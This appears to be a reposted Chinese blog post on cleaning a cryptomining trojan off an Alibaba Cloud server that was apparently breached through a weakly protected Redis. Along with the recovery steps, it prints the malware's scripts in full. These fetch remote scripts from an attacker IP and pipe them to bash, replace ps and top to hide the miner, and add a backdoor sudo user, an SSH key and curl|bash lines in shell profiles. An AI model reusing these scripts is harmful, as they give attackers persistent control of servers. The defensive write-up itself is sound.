好物优选点击查看详情 京东购买

暂无内容

阿里云云服务器被恶意纂改挖矿

高高兴兴来实验室学习,结果

请添加图片描述

top和ps查看进程,无异常(原因是top指令被纂改)

请添加图片描述

查看定时任务

crontab -l lanigiro 

发现一个定时任务,我从来没设置过定时任务[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EvrNJxWn-1646213868845)(面对木马,输的很彻底/img/1646212762807.png)]

修改定时任务

crontab -e 

修改失败

删除该定时任务

crontab -r 

删除失败

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ylG1Y1Hh-1646213868846)(面对木马,输的很彻底/img/1646209272600.png)]

原因是被锁定了

解锁

chattr -ai /var/spool/cron/root 

解锁失败,chattr被病毒删了

下载chattr.c

下载chattr.c https://github.com/posborne/linux-programming-interface-exercises/blob/a93a73842cac2143c873d78a30df5f8f32f5dab8/15-file-attributes/chattr.c

编译 ,生成a.out

cc chattr.c 
-bash-4.2# cc chattr.c -bash-4.2# ls a.out backup chattr.c clamav-0.104.2.linux.x86_64.rpm disk.pl Recycle_bin server swap wwwlogs wwwroot -bash-4.2# 

改名

mv a.out chattr 

运行

./chattr 

放回原处

mv chattr /usr/bin/ 

停止定时任务

解锁

chattr -ai /var/spool/cron/root 

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5QyHAotI-1646213868847)(面对木马,输的很彻底/img/1646209501828-1646213688509.png)]

查看锁

lsattr /var/spool/cron/root 

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cHANSeSy-1646213868848)(面对木马,输的很彻底/img/1646209762261.png)]

删除该定时任务

crontab -r 

失败

查看 crontab配置

cat /etc/crontab 

阿里云云服务器被恶意纂改挖矿插图6

被修改啦,暂时不管,停止定时任务服务

service crond stop 

查看脚本

这个定时任务的远程地址,下载脚本

#!/bin/bash echo "ok22$(date)" >>/tmp/ok.log export CURL_CMD="curl" if [ -f /bin/cd1 ];then export CURL_CMD="/bin/cd1" elif [ -f /bin/cur ];then export CURL_CMD="/bin/cur" elif [ -f /bin/TNTcurl ];then export CURL_CMD="/bin/TNTcurl" elif [ -f /bin/curltnt ];then export CURL_CMD="/bin/curltnt" elif [ -f /bin/curl1 ];then export CURL_CMD="/bin/curl1" elif [ -f /bin/cdt ];then export CURL_CMD="/bin/cdt" elif [ -f /bin/xcurl ];then export CURL_CMD="/bin/xcurl" elif [ -x "/bin/cdz" ];then export CURL_CMD="/bin/cdz" fi sh_url="http://104.192.82.138/s3f1015" export MOHOME=/var/tmp/.crypto/... if [ -f ${MOHOME}/.ddns.log ];then echo "process possible running" current=$(date +%s) last_modified=$(stat -c "%Y" ${MOHOME}/.ddns.log) if [ $(($current-$last_modified)) -gt 6 ];then echo "process is not running" else ${CURL_CMD} -fsSL -o ${MOHOME}/.ddns.pid ${sh_url}/m/reg0.tar.gz exit 0 fi fi if [ "$(id -u)" == "0" ];then ${CURL_CMD} -fsSL ${sh_url}/c/ar.sh |bash else ${CURL_CMD} -fsSL ${sh_url}/c/ai.sh |bash fi 

发现另一个地址http://104.192.82.138/s3f1015,下载脚本,打开

发现ps和top被修改

export PS_CMD="/bin/ps" pssize=$(ls -l /bin/ps | awk '{ print $5 }') ${CHATTR} -i /bin/ps if [ ${pssize} -le 8000 ];then ps_name=$(awk '/$@/ {print $1}' /bin/ps) if [ ! "${ps_name}" = "ps.lanigiro" ];then mv /bin/${ps_name} /bin/ps.lanigiro fi else mv /bin/ps /bin/ps.lanigiro fi echo "#!/bin/bash">/bin/ps echo "ps.lanigiro $@ | grep -v 'ddns|httpd'" >>/bin/ps touch -d 20160825 /bin/ps chmod a+x /bin/ps ${CHATTR} +i /bin/ps if [ -x /bin/ps.lanigiro ];then PS_CMD="/bin/ps.lanigiro" fi topsize=`ls -l /bin/top | awk '{ print $5 }'` ${CHATTR} -i /bin/top if [ ${topsize} -le 8000 ];then top_name=$(awk '/$@/ {print $1}' /bin/top) if [ ! "${top_name}" = "top.lanigiro" ];then mv /bin/${top_name} /bin/top.lanigiro fi else mv /bin/top /bin/top.lanigiro fi echo "#!/bin/bash">/bin/top echo "top.lanigiro $@ | grep -v 'ddns|httpd'">>/bin/top chmod a+x /bin/top touch -d 20160716 /bin/top ${CHATTR} +i /bin/top 

使用top被修改后的top.lanigiro,发现挖矿的进程 .ddns

top.lanigiro 

请添加图片描述

查看进程文件位置,(ps被纂改成ps.lanigiro)

ps.lanigiro -ef | grep 539 

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y2F7crqp-1646213868850)(面对木马,输的很彻底/img/1646211710714.png)]

进入对应文件夹删除全部文件,删不掉的使用

chattr -ai xxxx 

(忘了截图了)

杀死对应进程

kill 539 

查看脚本,似乎添加了很多文件,不知道有啥用,全删了

makesshaxx(){ RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs= root@pending.com" ${CHATTR} -ia /etc/passwd; grep -q lsb /etc/passwd || echo 'lsb:x:1000:1000::/home/lsb:/bin/bash' >> /etc/passwd ${CHATTR} +ia /etc/passwd ${CHATTR} -ia /etc/shadow grep -q "lsb:$6$4E4W/nnk" /etc/shadow || echo 'lsb:$y$j9T$4mqDHpJ8b4riHWm2FfUHY.$./.VlnKhJMI/hj8f8sxbqhIal0jKhPxjyHxB6ZGtUm6:18849:0:99999:7:::' >> /etc/shadow ${CHATTR} +ia /etc/shadow ${CHATTR} -ia /etc/sudoers grep -q lsb /etc/sudoers || echo 'lsb ALL=(ALL:ALL) ALL' >> /etc/sudoers ${CHATTR} +i /etc/sudoers mkdir /home/lsb/.ssh/ -p ${CHATTR} -ia /home/lsb/.ssh/authorized_keys touch /home/lsb/.ssh/authorized_keys chmod 600 /home/lsb/.ssh/authorized_keys grep -q root@pending.com /home/lsb/.ssh/authorized_keys || echo $RSAKEY > /home/lsb/.ssh/authorized_keys ${CHATTR} +ia /home/lsb/.ssh/authorized_keys ${CHATTR} -ia /home/lsb/.ssh/authorized_keys2 touch /home/lsb/.ssh/authorized_keys2 chmod 600 /home/lsb/.ssh/authorized_keys2 grep -q root@pending.com /home/lsb/.ssh/authorized_keys2 || echo $RSAKEY > /home/lsb/.ssh/authorized_keys2 ${CHATTR} +ia /home/lsb/.ssh/authorized_keys2 mkdir /root/.ssh/ -p ${CHATTR} -ia /root/.ssh/authorized_keys touch /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys grep -q root@pending.com /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys ${CHATTR} +ia /root/.ssh/authorized_keys ${CHATTR} -ia /root/.ssh/authorized_keys2 touch /root/.ssh/authorized_keys2 chmod 600 /root/.ssh/authorized_keys2 grep -q root@pending.com /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2 ${CHATTR} +ia /root/.ssh/authorized_keys2 for f in $(ls /home) do if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.profile > /dev/null;then echo "{" >> /home/${f}/.profile echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.profile echo "} > /dev/null 2>&1" >> /home/${f}/.profile fi if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.bashrc > /dev/null;then echo "{" >> /home/${f}/.bashrc echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.bashrc echo "} > /dev/null 2>&1" >> /home/${f}/.bashrc fi done if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.profile > /dev/null;then echo "{" >> /root/.profile echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.profile echo "} > /dev/null 2>&1" >> /root/.profile fi if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.bashrc > /dev/null;then echo "{" >> /root/.bashrc echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.bashrc echo "} > /dev/null 2>&1" >> /root/.bashrc fi } 

使用宝塔界面删。。方便找
请添加图片描述

将命令替换回来

cd /usr/bin chattr -ai ps mv ps.lanigiro ps chattr -ai top mv top.lanigiro top chattr -ai pstree mv pstree.lanigiro pstree 

到此为止,不完美解决,crontab定时功能没法用了,对我来说并不是很重要,所以。。。

请添加图片描述

查阅资料,发现该木马从redis中进来的,只要开启远程访问,密码较弱就有可能被侵入。这次输的很彻底。

原文链接:https://blog.csdn.net/heguu/article/details/123235987?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168449620216800180620806%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=168449620216800180620806&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-29-123235987-null-null.blog_rank_default&utm_term=NAS%E3%80%81%E7%BE%A4%E6%99%96%E3%80%81%E9%98%BF%E9%87%8C%E4%BA%91%E3%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90%E3%80%81%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E3%80%81ipv6%E3%80%81ddns%E3%80%81%E8%BD%BB%E9%87%8F%E7%BA%A7%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E9%93%81%E5%A8%81%E9%A9%AC%E3%80%81%E5%A8%81%E8%81%94%E9%80%9A%E3%80%81DSM%E3%80%81DSM6.0%E3%80%81%E7%BE%A4%E6%99%96nas%E3%80%81%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E8%9C%97%E7%89%9B%E6%98%9F%E9%99%85%E3%80%81%E9%BB%91%E7%BE%A4%E6%99%96%E3%80%81docker%E3%80%81%E5%AE%B9%E5%99%A8%E9%95%9C%E5%83%8F%E3%80%81%E5%9F%9F%E5%90%8D%E6%B3%A8%E5%86%8C%E3%80%81%E5%AE%9D%E5%A1%94%E3%80%81%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E3%80%81nginx%E3%80%81frp%E3%80%81%E5%8A%A8%E6%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享